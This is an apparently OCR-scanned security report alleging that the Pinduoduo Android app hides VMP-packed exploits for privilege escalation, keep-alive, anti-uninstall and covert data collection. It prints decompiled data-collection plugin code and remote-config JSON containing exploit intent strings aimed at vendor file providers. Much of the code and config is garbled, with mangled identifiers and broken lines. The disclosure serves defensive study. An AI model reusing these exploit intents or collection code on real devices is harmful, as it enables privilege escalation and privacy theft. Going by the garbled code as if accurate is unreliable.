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Analysis Report of Pinduoduo's Malicious Behaviors 


Abstract 


In a long time Pinduoduo continues to exploit the vulnerabilities of mobile phone manufacturers and cloud 
services for customer acquisition, user retention, circumventing privacy compliance regulation and 
breaking system restrictions to obtain accurate user profiles and break system restrictions to reach a large 
number of users for transaction conversion. With conservative statistics on a yearly basis, they obtained at 
least 50 million new users and 20 billion GMV by forcing users to install, and saved 100 million App 
promotion cost; they stole a large amount of user privacy by exploiting Android OS vulnerabilities, so as to 
understand users better and obtain 40% user reach enhancement and drive 40% GMV. The behavior of 
forcing users to install includes, by exploiting app store, WeChat browser, and Link jumping vulnerability 
with social fission to achieve remote silent installation; behavior of exploiting vulnerabilities include, using 
the Android system and OEM vulnerabilities to escalate privilege to System user, and then install backdoors 
to reside in the system, Followed by malicious behaviors such as unti-install, keep-alive and anti-turned off, 
theft of other App data (including chat records and Internet behavior, etc.), disguised as other App to trick 
users to open, evade compliance Supervision to obtain mass access to user privacy information, bypassing 
the operating system's notification restrictions and other actions so as to achieve retention conversion rate 


increase, improve user reach, DAU, MAU, user accurate portrait, advertising revenue and transaction 
conversion rate increase, etc. Looking back into these, one may truely understand what Pinduoduo's 
growth myth comes from? These illegal behaviors are a huge boost to its growth, just like what its code 
describes: PddRocket. 


In a word, Pinduduo has turned hundreds of millions of its users into botnet Fully controlled by itself for its 
own interest by attacking its users' device, which we believe is the largest security incident which even NSA 
is not capable of. 


Pinduoduo bundles sophiscated packed vulnerability exploits using VMP in its publicly released main App: 
com.xunmeng.pinduoduo. According to the reverse analysis of its App code, policy analysis, and industry 
vendor Feedbacks, the behavior has Full volume and full geographic coverage of its users, about 400 
million+ affected devices, and fine-grained control by cloud policies containing tens of thousands of 
configuration items, giving a huge advantage to its business development. In this paper, we have conducted 
reverse analysis work and summarized its behavior, technical architecture, and implementation. The 
analysis of relevant technical details can be Found in Appendix I, Appendix II. 


Overview of Pinduoduo's malicious behaviors 


Pindouduo's overall malicious behavior revolves around three purposes: customer acquisition, transaction 
promotion, and high daily activity, and the specific behaviors can be divided into Five major categories: keep 
alive, inducement deception, anti-uninstallation, information collection, and attack&infection. Among 
them, the purpose of high daily activity is mainly achieved by the following types of behaviors: 


¢ keep alive behavior 

« Deceptive behavior 

e Anti-uninstallation behavior 
e Attack&inFfection behavior 


The customer acquisition purpose is achieved by the following behaviors. 
e Remote silent installation behavior and link forgery behavior 


These behaviors can significantly increase their App activity, push user promotion messages in real time 
without user consent, improve conversion rate, and increase DAU/MAU and installation number The 
purpose of transaction promotion is mainly achieved by the following categories. 


e keep alive behavior 
e Deceptive behavior 
e Information collection behavior 


This kind of behavior can be used to obtain a considerable amount of user privacy information that policies 
and permissions do not allow access to, competitors’ confidential data, accurate portraits of users and 
other apps or even rebuild their social networks, and precisely improve the conversion rate of transactions. 
At the same time by bypassing the system and manufacturer restrictions, Pinduoduo is able to continuous 
push messages to users to promote users to buy. 


The description of each behavior are as follows. 


Keep-alive behavior 


Description: keep-alive behavior, means adding itself to the system's auto-start whitelist, using methods 
such as associated boot whitelist, background whitelist, lock screen whitelist, hover window, 1-pixel 
transparent icon, power saving policy, etc. to bypass the system's Forced hibernation limit and keep 
surviving in the background. It can also modify or hide its own power consumption to escape user's 
attention. For implementation details see live_security_biz_plugin. 


Benefit: Able to push user promotion news and improve conversion rate in real time; background collection 
of user behavior, listening to user operations, other App operations 


Induce deceptive behavior 


Description: Bypass system restrictions to construct full-screen ads, fake notifications (e.g. Full-screen red 
promotion messages appeared in lock screen or when user unlocks the screen) to induce users to click; 
hijack user wallpapers, hijack user calendars, alarms, etc; keep showing the unread status of messages to 
attract users to click; modify user battery status. Details see [Strategy analysis](# Appendix III: description 
of each Strategy usage) 


Anti-uninstallation behavior 


Description: Making the user unable to delete the app by means of fake icons, widgets, etc.; or intercept 
user's uninstallation operation by injecting the system process 


Information collection behavior 


User privacy information collection 


Description: Break through privacy compliance regulation and system restrictions by exploiting 
vulnerabilities to add permissions For themselves, collect users’ location, Wifi, identification codes, photo 
albums, installed package information, user account information, history notifications, chat logs, etc; and 
conduct accurate portraits of users. See information collection plugin 


Benefit: Pinduoduo uses these illegally collected user data to improve business conversion rate, customer 
complaint handling analysis, monitor competitors’ personnels and VIPs, suppliers, and specific people they 
are interested in. WeChat records they collected are sent to online server for decryption and analysis. 


Industry information collection 


Description: After Pinduoduo managed to escalate privilege, it starts to collect other Apps' DAU, MAU and 
running stats, notification history. The monitoring list explicitly contains Taobao, Douyin (Tiktok's China 
version) and many other major Apps. See information collection plugin for implementation details 


Benefit: Pinduoduo uses this to monitor competitors’ live data. 
Attack&infection behavior 


Description: Pinduoduo attacks other apps and system apps after it escalates privilege to deploy persistent 
backdoor to add permissions for itself and kill other apps. see Privilege escalation plugin For 
implementation details 


Remote silent installation behavior and link Forgery behavior 


Description: Pinduoduo exploits vulnerabilities in application market interface, vendor advertising 
interface, browser, WeChat WebView, to achieve one-click remote silent install on users' phones when user 
is tricked to click on a link or webpage distributed by Pinduoduo. Combined with social Fission, the effect is 
huge. Through URL jumping vulnerability, XSS vulnerability, etc. they deploy their own malicious code on 
white domains to WeChat and browser content blocking. 


Appendix I: Technical Architecture Reverse and 
Analysis 


Background 


Android was designed with a sandbox mechanism controlled by permissions and data isolation at the 
beginning. Access to private data such as geolocation, address book, photo album, etc. requires user 
authorization and is managed by the system's PermissionManagerSystem in a unified manner. Some of the 
high-risk permissions can only by accessed by privileged applications and normal apps are not allowed to 
use; Each App has different uid so that each App's data is isolated From each other. 


Generally Apps installed From Market in Android has untrusted_app label, while Apps developed by 
manufacturers (Google, Samsung, Huawei, Oppo, Xiaomi, etc) has a label with higher permission: 
system_app. Usually OEMs such as Huawei, Xiaomi and others will do some customization and add some 
addtional functionalities such as in-house implementation of backup, security housekeeping and others, so 
its system Apps will have some additional permissions, such as application liveless management (to avoid 
applications deliberately running in the background For along time), auto-boot management, etc. 


App in Android consists of four major kinds of components (Activity, Service, Content Provider, Broadcast 
Receiver) and they communicate with each other using Intents. Access control on components depends on 
exported Flag and permission declared in the relevant manifest element. Systemapp can open the 
components at will, or read and write all systemapp private Files through ContentProvider. And of course, 
kernel has the highest privilege and can do anything it want, accessing everything. 


However, vulnerabilities can occur in the design of any security mechanism; from the traditional permission 
relay attack (attacking an already privilege application to steal its permission, generally targeting the 
vendor app), to the component vulnerabilities (attacking components in privileged apps and by exploiting 
path traversal, Intent hijacking and other vulnerabilities to hijacking the target app's ability to overwrite 
Files, execute code, and launch private components). Also, a bit more complex type of vulnerability - Parcel 
Mismatch vulnerability and kernel vulnerabilities also occurs. Details see this OWASP link. 
[https://mas.owasp.org/MASTG/Android/0x05a-Platform-Overview/] 


PDD mines nearly all kinds of vulnerabilties mentioned above in AOSP and the vendor code, to achieve the 
Following effects. 


1. bypass the system permissions control and user authorization, to silently obtain permission to evade 
privacy supervision 

2. read and write sensitive Files, modify the system manager data, to achieve keep-alive, auto self-boot, 
hide power consumption, anti-uninstallation 

3. privilege escalation to system-app, access to system-app execution capabilities, injection of 
backdoors, monitoring usage of other apps 


4. obtain the user's device privacy information (social media accounts such as Weibo and Bilibili, and 
Wechat chatlogs) and upload 

5. Inject backdoors into other App processes for persistence 

6. Kernel privilege escalation 


Pinduoduo Sample analyzed 
The app version analyzed is 6.44.0, MD5 hash value 7539f39092c2b279c072e5922b0e4ad4 
<manifest android:compileSdkVersion="33" 


android: compileSdkVersionCodename="13" android: versionCode="64400" 
android: versionName="6.44.0" package="com. xunmeng.pinduoduo" 


Architecture Design 


The architecture is divided into Privilege Escalation, Configuration, and Business layers, which 
are driven by an event bus. The business layer is vertically divided into Abi lity, Stragtegy, and 


Service, as follows. 
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e The Privilege Escalation layer: this layer use Parcel Mismatch and other Oday or 1day vulnerabilities 
to obtain LaunchAnyWhere ability. It then attacks System-app's fileproviders, and obtain the ability 
to read and write System-App Files. Kernel exploits are also used in some situations. The exploit code 
mainly resides in alive base ability plugin, located in the private directory file 
bot\alive_strategy_base_plugin\6.46.7\mw1.bin. The Privilege Escalation layer 
wraps the corresponding abilities obtained through exploits and exposes it to the business layer 


through interfaces to further execute the platform-related logic. 
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15 import com.xunmeng.pinduoduo.alive.unify.ability.framework_buildin.interfaces.IAbility; 


16 import com.xunmeng.pinduoduo.android_pull_ability_comp.pullstartup.C0188a; 
17 import com.xunmeng.pinduoduo.android_pull_ability_comp.pullstartup.sona.C@237a; 


18 import com.xunmeng.pinduoduo.android_pull_ability_impl_interface.interf.IAlivePullStartUp; 


19 import com.xunmeng.pinduoduo. launcher_detect_comp.imp1.c@259a; 


28 import com.xunmeng.pinduoduo. launcher_detect_comp_interf.interf.IVivoBindServiceComp; 


21 import com.xunmeng.pinduoduo.unify.ability.dybuild_buildin.C@327b; 
22 import java.util.Map; 
23 import java.util.Set; 


25 /* Loaded from: Main.class */ 
26 public class Main { 


27 private static final String TAG = null; 
28 
29 public static IStrategy createStrategyProxy(String str) { 
30 Logger.i("LVBA.Plugin.Main", "“createStrategyProxy: " + str); 
31 return (IStrategy) C0000b.m1101a(str) ; 
32 
33 
34 public static IReceiver createReceiverProxy(String str) { 
35 Logger.i("LVBA.Plugin.Main", "createReceiverProxy: " + str); 
36 return (IReceiver) C0000b.m1101a(str) ; 
37 
38 
39 public static IVivoBindServiceComp getLauncherDetectVivoBindService() { 
40 Logger.i("LVBA.Plugin.Main", “getLauncherDetectVivoBindService”) ; 
41 return CQ@259a.m224a(); 
42 
43 
44 public static IActivity createActivityProxy(String str) { 
45 Logger.i("“LVBA.Plugin.Main", “createActivityProxy: " + str); 
46 return (IActivity) C000@b.m1101a(str) ; 
47 
48 
49 public static ISonaAbility getSonaAbility() { 
50 Logger.i("LVBA.Plugin.Main", “getSonaAbility"); 
51 return new CQ237a(); 
52 
53 
54 public static IService createServiceProxy(String str) { 
55 Logger.i("LVBA.Plugin.Main", "createServiceProxy: " + str); 
56 return (IService) CQ0@@b.m1101a(str); 
Sf 
58 
59 public static Set getComponentNames() { 
60 Logger.i("LVBA.Plugin.Main", “getComponentNames") ; 
61 return CQQ0@b.m1102a(); 
62 
63 
64 public static IAlivePullStartUp getAlivePullStartUp() { 
65 Logger.i("LVBA.Plugin.Main", "“getAlivePullStartUp") ; 
66 return new CQ188a(); 
67 
68 
69 public static IAliveBaseAbility getAliveBaseAbility() { 
78 Logger.i("LVBA.Plugin.Main", “getAliveBaseAbilityInstance"); 
71 return new C00@3a(); 
72 ; 
i 


©, C02 


e Business layer: The business logic layer that specifically do evil things containing 77 Strategy. For 


example, PurgeV2Strategy contains code that read/write privileged system configuration Files 


through Privilege Escalation layer. The DarchrowStragey contains code that keeps itself alive on 


Xiaomi platform by hijacking Xiaomi's System Security Manager App. These St ragey are categorized 


into Framework, which are then exposed in the form of Abi Lit y, such as AntiUninstallAbility, 


DataCollectionAbility, to be used in the App's other part. The two layers are currently protected by 


VMP. bot\alive_strategy_biz_plugin\6.45.5\mw1.bin, while an open source unpacker 


exists. See unpacker[https://github.com/davinci1012/pinduoduo_backdoor_unpacker] 
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@ IAsyncDataCollector 39 ISONObject jSONObject = new JSONObject(); 

@ IDataCallback 40 JSONObject.put("id", optString); 

@ IDatacollector Ja JsONObject.put("pke", "com-huawed-huid. sdx0@0") ; 

42 JSONArray . put (jSONObject) ; 


© InfoResult \43 return jSONArray.toString() ; 


© ReportInfoltem } catch (Throwable th) { 
collectors Logger.e("LVUA.Dynamic.DataCollectAbility.HwSdNickName", th); 
wae return null; 
activityUsageStats } 
lbs } 
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private boolean isSupport() { 
boolean z = false; 
try ( 
z = SdThousandAbility.instance() .isAbilitySupport (StrategyFramework.getFrameworkContext(), "get_account_extra"); 
} catch (Throwable th) { 
Logger. i("LVUA.Dynamic.DataCollectAbility.HwSdNickName", “failed to check sd1@0@ isSupport"); 


© All PkgUsageConfig 
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©, DummyAsyncCollector 


@, HonorClubidcollector } 
©, HwLowVerLocationCollec |>7 Logger.i("LVUA.Dynamic.DateCollectAbility.HwSdNickName", "get_account_extra has sd1@@@ ability:" + z); 
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public void collectAsync(BaseTriggerEvent baseTriggerEvent, IDataCallback iDataCallback) { 
if (StrategyFramework.hasCapability("ISdThousandAbility") && isSupport()) { 
getAccountAsync( iDataCallback) ; 
} else { 
Logger. i("LVUA.Dynamic.DataCollectability.HwSdNickName", “no Capability"); 


is 
} 


private void requestAccount(final IDataCallback iDataCallback) {| 
try { 
ISONObject jSONObject = new ISONObject(); 
JsoNArray jSONArray = new JSONArray(); 
J80NArray.. put ("“loginUserNvame") ; 
JSONObject.put("type", “com.huawei.hwid") ; 
SONObject.put("keys", JSONArray); 
SdThousandAbility. instance() .tryInvokeAbility(StrategyFramework.getFrameworkContext(), new SdThousandAbilityRequest("get_account_extra", jSONObject.toString()), new CreamUtils() { // 
public void onAbilityInvokeCallback(SdThousandAbilityResponse sdThousandAbilityResponse) { 
Logger.i("LVUA.Dynamic.ataCollectAbility.HwSdNickName", "callback:" + sdThousandAbilityResponse.isSucceed() + ";message:" + sdThousandAbilityResponse.getMessage()); 
Logger .d("LVUA.Dynamic.DataCollectAbility.HwSdNickName", “respon + sdThousandAbilityResponse) ; 
iDataCal back. onDataCollected (HwSdNickNameCollector .this.getRet (sdThousandAbilityResponse) ) ; 
HwSdNickNameCollector.this.mHasRequest.set(false) ; 
+ 
ns 
} catch (Throwable th) { 
Logger.e("LVUA.Dynamic.DataCollectability.HwSdNickName", th); 
iDataCallback. onDataCollected(null) ; 
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¢ Configuration layer: RemoteConfig class provides Fine-grained policy control and remote control 
capability. Whether any policy is turned on and running depends on querying RemoteConfig, and 
some configuration information in the exploit code can also be updated from the remote end. These 
configuration Files are pulled and stored in the app_mango/ directory, and the total configuration 
Files' size are more than 3000K. The configurations can be Found in Pinduoduo's directory: 


raw_ab _data json, raw_config_data.json, raw _exp_ab _data,json. 


b1z_jessie_cross_bind DarchrowStrategy 
“pinduoduo_Android. te _strategy_biz_jessie_daemon_kv_60100\",\n MOLE cra ea \Mexp_ default_fals., , \ 


‘a_st_biz_jessie_event_trigger_56400\",\n \"enableFileLoggerExp\": \"pinduoduo_Android.ka_strategy_biz_jessie_log_56700\",\n \"enableForceStopDetectByRecentAppExp\": 
"pinduoduo_Android.ka_st_biz_jessie_force_stop_detect_56400\",\n \"enableForceStopDetectByServiceCleanExp\": \"pinduoduo_Android.ka_st_biz_jessie_force_stop_detect_56400\",\n 
“enableForceStopDetectBySettingTopActivityExp\": \"pinduoduo_Android.ka_st_biz_jessie_force_stop_detect_56400\",\n \"enableFrozenListenExp\": \"“exp_default_false\", \n 
“enableInstrumentExp\": \"exp_default_true\",\n \"enableInst rumentWhenMainProcAliveExp \"pinduoduo_Android.ka_st_biz_jessie_enable_instrument_when_proc_alive_56400\",\n 
“enableLogExp\": \"pinduoduo_Android.ka_strategy_biz_jessie_log_5670@\",\n \"enableNativeEventTrackExp\": \"exp_default_false\",\n \"enablePeriodUnfreezeExp\": 
“exp_default_false\",\n \"enablePullAliveAlarmExp\": \"pinduoduo_Android.ka_st_biz_jessie_pull_alive_by_alarm_5640@\",\n \"enableServiceProcFileLockExp\": \"exp_default_false\", 
n \"enableTopActivityDetectDebugModeExp\": \"exp_default_false\",\n \"enableTrackStartPullAliveExp\": \"exp_default_false\",\n \"enableUnfreezeDaemonExp\": \"pinduoduo_Android 
a_st_biz_jessie_native_unf reeze_56400\",\n \"forceStopDetectInRecentTaskExp\": \"pinduoduo_Android.ka_st_biz_jessie_force_stop_detect_56400\",\n \"forceStopDetectInSettingsExp\": 
pinduoduo_Android.ka_st_biz_jessie_force_stop_detect_56400\",\n \"getMainProcStatusByFileExp\": \"exp_default_false\",\n \"getMainProcStatusByShellExp\": \"exp_default_false\", 
n \"LauncherExitTargetActivityName\ com.android.settings/. applications. InstalledAppDetailsTop; com. huawei. systemmanager/.power.ui.Detail0fSoftConsumptionActivity\",\n 
"LauncherHomeActivityName\": \"com.huawei.android. launcher. unihome.UniHomeLauncher\", \n \"mainProcStatusByForegroundStateExp\": \"exp_default_false\", \n 
“mainProcStatusByScreenStateExp\": \"exp_default_false\",\n \"periodUnfreezeCreateSkyExp\": \"exp_default_false\",\n \"pullAliveCountLimitByNativeExp\": \"exp_default_true\", \n 
"pullAliveThroughJssExp\": \"exp_default_false\",\n \"screenStateDispatchExp\": \"exp_default_false\",\n \"serviceCleanActivityName\": \"com.android.settings/.CleanSubSettings, co] 
ndroid.settings/.SubSettings\",\n \"settingsTopActivityNames\": \"com.android.settings.HwSettings\",\n \"startNssShellFgExp\": \"pinduoduo_Android. 
a_st_biz_jessie_nss_shell_fg_56400\",\n \"toggLeComponentSettingStateExp\": \"pinduoduo_Android.ka_st_biz_jessie_toggle_component_56400\",\n \"trackInstrumentStartEventExp\": 
"“exp_default_false\",\n \"skipAutoStartCheck\ false,\n \"pullAliveDaemonProcessTotalCountLimit\ 100,\n \"getDaemonkVRecordsDelpyInSec\": @,\n 
“mainProcScreenOffTimeLimitInSec\' 300,\n \"daemonkVCacheF lushSizeLimit\": 50,\n \"crossBindCount\": 20,\n \"heartBeatIntervalInSec\": 3,\n 

"pullAliveTotalStatDurationInSec\' 86400,\n \"mainProcBackgroundTimeLimitInSec\": 300@,\n \"wakeLockTimeoutMs\ 5000,\n \"recentAppIntervalInSec\": 3,\n 
"daemonKVCacheDupRecordsCleanTimeInSec\": 100,\n \"skipHandleSingleForceStop\": true, \n \"pullAliveFreqCountLimit\": 1,\n \"pullALiveFreqStatDurationInSec\": 68,\n 
"codeStartDelayInSecond\": 5,\n \"skipDauCheck\": false, \n \"periodUnfreezeIntervalInSec\": @,\n \"periodUnfreezeKeepInSec\": @,\n \"updateDaemonKVRecordsDelayInSec\": 3, 
n \"pullAliveAlarmDelayInSec\": 1800,\n \"settingGapTimeInSec\": 6@,\n \"pullALiveTotalCountLimit\": 50,\n \"enablePapmExp\": \"pinduoduo_Android. 
‘a_st_biz_jessie_papm_57800\",\n \“enablePullALliveIntervalLimit\": \"pinduoduo_Android.ka_st_biz_jessie_pull_alive_interval_lLimit_57900\",\n \"pullAliveIntervalInMs\": 100,\n 
“getDaemonKVRecordsDelayInMs\ @,\n \"useOldLauncherDetect\ \"pinduoduo_Android.ka_strategy_biz_jessie_use_old_launcher_detect_56400\",\n \"useNewLdLibraryPathExp\": 
“pinduoduo_Android.ka_strategy_biz_jessie_use_new_path_645@0\",\n \"crashIfLoadErrorExp\": \"pinduoduo_Android.ka_strategy_biz_jessie_crash_if_error_64500\"\n}}" "pinduoduo_Android. 
‘a_strategy_comp_tide_v2_60500 {\n \"tag\": \"oppo8.x+\",\n \"LowersionPeriodInSec\": 900,\n \"activePeriodInSec\": 900,\n \"workingPeriodInSec\ 908,\n 
“frequentPeriodInSec\": 3600,\n \"rarePeriodInSec\ 28800,\n \"unknownPeriodInSec\": 900,\n \"periodV1\": 14400,\n \"blacklistScene’ \"1012\",\n \"refreshTTLMills\": 
6400000, \n \"invalidTTLMills\": 172800000\n}","1":"{\n \"tag\": \"xiaomi\",\n \"lowersionPeriodInSec\": 900,\n \"activePeriodInSec\": 90@,\n \"workingPeriodInSec\": 9@Q| 
n \"frequentPeriodInSec\": 3600,\n \"rarePeriodInSec\": 28800,\n unknownPeriodInSec 900,\n \"periodV1\": 1800,\n \"blacklistScene’ \"1012\",\n 

“refreshTTLMills\": 86400000, \n \"invalidTTLMills\": 172800000\n}", {\r\n \"tag\": \"xiaomi\", \r\n \"lowVersionPeriodInSec\": 900,\r\n \"activePeriodInSec\": 900,\r\n 
“workingPeriodInSec\": 900,\r\n \"frequentPeriodInSec\": 3600,\r\n \"rarePeriodInSec\' 28800,\r\n \"unknownPeriodInSec\": 900,\r\n periodV1 3600,\r\n 
“blacklistScene\": \"1012\",\r\n \"refreshTTLMills\": 86400000,\r\n \"invalidTTLMills\": 172800000\r\n}","3":"{\r\n \"tag\": \“oppo8.x+\",\r\n \"lowersionPeriodInSec\": 90 
r\n \"activePeriodInSec\": 900,\r\n \"workingPeriodInSec\": 900,\r\n \"frequentPeriodInSec\": 3600,\r\n \"rarePeriodInSec\": 28800,\r\n "unknownPeriodInSec\": 900, 

r\n \"periodV1\": 28800,\r\n \"blacklistScene\": \"1012\",\r\n \"refreshTTLMills\": 86400000,\r\n \"invalidTTLMills\": 172800000\r\n}","4":"{\r\n \"tag\": \"vivo8.x+\", 
r\n \"low/ersionPeriodInSec\": 900,\r\n \"activePeriodInSec\ 900,\r\n \"workingPeriodInSec\": 900,\r\n \"frequentPeriodInSec\": 3600,\r\n \"rarePeriodInSec\": 28800, 
r\n \"unknownPeriodInSec\": 90@,\r\n \"periodV1\": 28800,\r\n \"blacklistScene\ \"1012\"",\r\n \"refreshTTLMills\ 86400000, \r\n \"invalidTTLMills\": 172800000\r\n}", 
Sea r\n \"tag\": \"default\", \r\n \" LowersionPeriodInSec\ 900,\r\n \"activePeriodInSec\": 900,\r\n \"workingPeriodInSec\": 90@,\r\n \"frequentPeriodInSec\": 3600, 
r\n \"rarePeriodInSec\' 28800,\r\n \"unknownPeriodInSec\ 900,\r\n \"periodV1\": 180@,\r\n \"blacklistScene\": \"1012\",\r\n \"refreshTTLMills 86400000, \r\n 
"invalidTTLMills\": 172800000\r\n "{\n \"tag\": \"vivo8.x+\",\n \"low/ersionPeriodInSec\": 90@,\n \"activePeriodInSec\": 980,\n \"workingPeriodInSec\": 900,\n 
"frequentPeriodInSec\": 3600, \n \"rarePeriodInSec\": 2880@,\n "unknownPeriodInSec\": 900,\n \"periodV1\ 14400,\n \"blacklistScene’ \"1012\",\n \"refreshTTLMills\ 
6400000,\n \"invalidTTLMills\": 172800000\n}"," \n \"tag\": \"default\",\n \"lowVersionPeriodInSec\": 90@,\n \"activePeriodInSec 900,\n \"workingPeriodInSec\ 

n \"frequentPeriodInSec 3600,\n \"rarePeriodInSec\": 288@0,\n \"unknownPeriodInSec\": 90@,\n \"periodV1\": 90@,\n \"blacklistScene\": \"1012\",\n 

“refreshTTLMills\": 86400000, \n \“invalidTTLMills\": 172800000\n}"},"pinduoduo_Android.ka_provider_intent_xm_theme_manager_62500 {\n \"scene\": \"XM_THEME_MANAGER\", \n 
“targetIntent \"content://com.android. thememanager. fileprovider/share_images#Intent; launchFlags=0xc3; component=com. xunmeng. pinduoduo/com. xunmeng. pinduoduo.alive. impl.provider. 
component. HFPActivity;end\",\n \"targetUri\": \"content://com.android. thememanager. fileprovider/share_images\", \n \"needAddSpecialFlags\": false,\n \"flags\": @\n}"}, 
plugin_strategy_le_blanc_strategy_6100! \"blackListScene\ 3078\"\r\n}" "pinduoduo_Android.ka_provider_provider_hw_intelligent_59000" \n \"scene 
“provider_hw_intelligent\",\n \"targetIntent\": \"content://com. huawei. intelligent. fastapp. engine. fileProvider/root_path#Intent; component=com. xunmeng.pinduoduo/com. xunmeng. pinduoduo} 
Live. impl. provider. component.HFPActivity;end\",\n \"targetUri\": \"content://com. huawei. intelligent. fastapp.engine. fileProvider/root_path\",\n needAddSpecialFlags\": false,\n 
“needTransit\": true,\n \"transitIntentUri \"#Intent; launchFlags=0x40008000; component=com. huawei. intelligent/com. huawei. hms.activity.BridgeActivity;S.intent.extra. 
ELEGATE_CLASS_OBJECT=com. huawei. hms. adapter.ui.BaseResolutionAdapter; end\",\n \"transitIntentKey\": \"resolution\", \n “flags\' “pinduoduo_Android. 
a_provider_intent_xm_assistant_cache_63400" "{\r\n \"scene\": \"provider_xm_assistant_cache\",\r\n \"targetIntent\": \"content://com.miui.voiceassist.fileprovider/ 
ache_path#Inten omponent=com. xunmeng. pinduoduo/com. xunmeng. pinduoduo. alive. impl.provider. component.HFPActivity;end\",\r\n \"targetUri\ \"content://com.miui. voiceassist. 
ileprovider/cache_path\",\r\n \"needAddSpecialFlags\ false,\r\n \"needTransit\ true,\r\n \"transitIntentUri\ \"#Intent; LlaunchFlags=0x40008000; component=com.miui. 
‘oiceassist/com. tencent. connect. common.AssistActivity;end\",\r\n \"transitIntentKey\ el . i ity. , \"isUseIntentChooser\' true,\r\n 

"flags\": Q\r\n}"'},"pinduoduo_Android.ka_strategy_biz_purge_575@0_oppo_ld {\n \"provider_oppo_ld\",\n \"requireScreenOn\": false, \n \"acceptedTriggerEvents\" 
\n \"PROCESS_START\" SCREEN_OFF\", \n \"ON_BACKGROUND\"\n ]\n}"},"pinduoduo_Android. ka_strategy_framework_definition_5600 al "{\n \"strategyList\": 


Event Bus: TriggerManager class, which listens to 34 events in the TriggerEventType, and Strategies 
are triggered when specific events occur adetermines under what conditions it will be triggered to 
execute through dynamic configuration Files. For example, SCREEN_ON, SCREEN_OFF events For 


screen unlocking, FP_PERM_READY events for power-up completion, etc. 


Example: Sample configuration code Found in Pinduoduo App 


TriggerEventType.PROCESS_ START = new TriggerEventType(0, 
EPROCESS_START” )ir 

TriggerEventType.IRREGULAR_PROCESS_START = new TriggerEventType(1, 
"TRREGULAR_PROCESS_ START"); 

TriggerEventType.ALIVE_ABILITY_DISABLE = new TriggerEventType(2, 
"ALIVE_ABILITY_DISABLE") ; 

TriggerEventType.SCREEN_ON = new TriggerEventType(10, "SCREEN_ON"); 

TriggerEventType.SCREEN_OFF = new TriggerEventType(11, 
VSCREENZOEE)) 

TriggerEventType.USER_PRESENT = new TriggerEventType(i2, 
"USER_PRESENT"); 

TriggerEventType.ON_BACKGROUND = new TriggerEventType( 20, 
"ON_BACKGROUND") ; 

TriggerEventType.ON_FOREGROUND = new TriggerEventType(21, 
"ON_FOREGROUND") ; 

TriggerEventType.BACKGROUND_1MIN_TIMER = new TriggerEventType(30, 
"BACKGROUND_1MIN_TIMER") ; 

TriggerEventType.PDD_ID_CONFIRM = new TriggerEventType(40, 
"PDD_ID_CONFIRM"); 

TriggerEventType.POWER_DISCONNECTED = new TriggerEventType(50, 
"POWER_DISCONNECTED"); 

TriggerEventType.POWER_CONNECTED = new TriggerEventType(51, 


"POWER_CONNECTED"); 
TriggerEventType 
“TOUCHEEVENT © )# 
TriggerEventType 
"ESPL_EVENT"); 
TriggerEventType 
UDPPLSEVENT.})i: 
TriggerEventType 
"ACVT_EVENT" ); 
TriggerEventType 
UD TELS EVENT OF 
TriggerEventType 
eT DMEEVENTE) 
TriggerEventType 
USTARTZSKY2CASTINE)) 
TriggerEventType 
USTOPESKY2CASTIEE™))- 
TriggerEventType 
"DECORATE_DONE"); 
TriggerEventType 
"EP_PERM_READY" ); 
TriggerEventType 
TriggerEventType 
"DAU_CHANGED") ; 
TriggerEventType 
"STARTUP_COMPLETE" ) ; 
TriggerEventType 
"STARTUP_IDLE"); 
TriggerEventType 
"USER_IDLE"); 
TriggerEventType 
"FAKE_INSTALL_COMPLETE" ) 
TriggerEventType 
"SCREEN_RECORD_START"); 
TriggerEventType 
"SCREEN_RECORD_STOP"); 
TriggerEventType 
"SD_ASTER_SYNC_DOWN"); 
TriggerEventType 
"SD_COMP_READY" ); 
TriggerEventType 
"PV_CHANGED" ); 
TriggerEventType 
"DBG_EVENT"); 


. TOUCH_EVENT = new TriggerEventType(60, 


.FSPL_EVENT = new TriggerEventType(70, 
.DPPL_EVENT = new TriggerEventType(71, 
.-ACVT_EVENT = new TriggerEventType(80, 
.DIEL_EVENT = new TriggerEventType(90, 
. ITDM_EVENT = new TriggerEventType(100, 


. START_SKY_CASTLE new TriggerEventType(110, 


. STOP_SKY_CASTLE new TriggerEventType(Ox6F, 


. DECORATE_DONE new TriggerEventType(1i20, 


. FP_PERM_READY new TriggerEventType(130, 


.AU_INIT = new TriggerEventType(140, "AU_INIT"); 
. DAU_EVENT new TriggerEventType(0x8D, 


. STARTUP_COMPLETE new TriggerEventType(Ox8E, 


. STARTUP_IDLE new TriggerEventType(Ox8F, 


. USER_IDLE new TriggerEventType(0x90, 


.FAKE_INSTALL_COMPLETE = new TriggerEventType(150, 


Ul 


.SCREEN_RECORD_START = new TriggerEventType(0xA0, 


.SCREEN_RECORD_STOP = new TriggerEventType(0xA1, 


. SD_ASTER_SYNC_DOWN new TriggerEventType(170, 


. SD_COMP_READY new TriggerEventType(OxAB, 


. PV_CHANGED_EVENT = new TriggerEventType(1i80, 


. DBBG_EVENT new TriggerEventType(190, 


Modules are distributed through componentization and released or updated at app launch via built-in 


resource or remote download, as shown in the Following Figure:  ibots 


The related modules are protected by two sets of VMPs (inanwe and nvwa). manwe is designed based on the 


concept of JVM on Java, while the constant pool design is a bit different from the original JVM, and 


multiple classes are compressed in a bin file. Opcodes of manwe are basically same with standard JVM. 


nvwa convert dalvik opcode to native interpreter opcode. The VMP component interacts with the interface 


in the main app through the PluginBridge class. Related unpacker code can be seen at 
https://github.com/davinci1012/pinduoduo_backdoor_unpacker 


After we get to know the architecutre of PDD's evil system, we starts to dig into each part of it. 


Analysis of each module 


alive_base_ability_plugin 


Located in bot/alive_base_ability_plugin/mw1.bin, the main Function entry is 


com. xunmeng.pinduoduo.five.base.ability.comp.Main, which exports the Following interfaces 


and the role of each interface are listed as Follows: 


e IStrategy: get Strategy by name 
¢ |IReceiver, IService, |[Activity: Componentized virtual interface 


e IVivoBindServiceCompgetLauncherDetectVivoBindService: Some Vivo vulnerability exploits 


e |ISonaAbility: After a malicious Intent is constructed, the attack is carried out through SonaAbility 


who actually exploits Parcel Mismatch vulnerabilities to deliver the privileged Intent 
e JAlivePullStartUp: Exposed as an interface, other components call this interface to launch Intent 


attacks 


© makeBundle(Intent arg1); 


o startAccount(Intent arg1); 


o startSpecialActivity(Intent arg1); 


o stopSpecialActivity(Intent arg1); 


e lAlivePullStartUp: The core component that provides platform-based live capability, privileged File 


access based on privilege escalation vulnerabilities 
o |AliveStartup AliveStartup(); 


boolean canStartBackgroundActivity(); 

boolean canStartBgActivityByAlarm(int arg1, boolean arg2); 

boolean canStartBgActivityByFullScreenNotification(); 

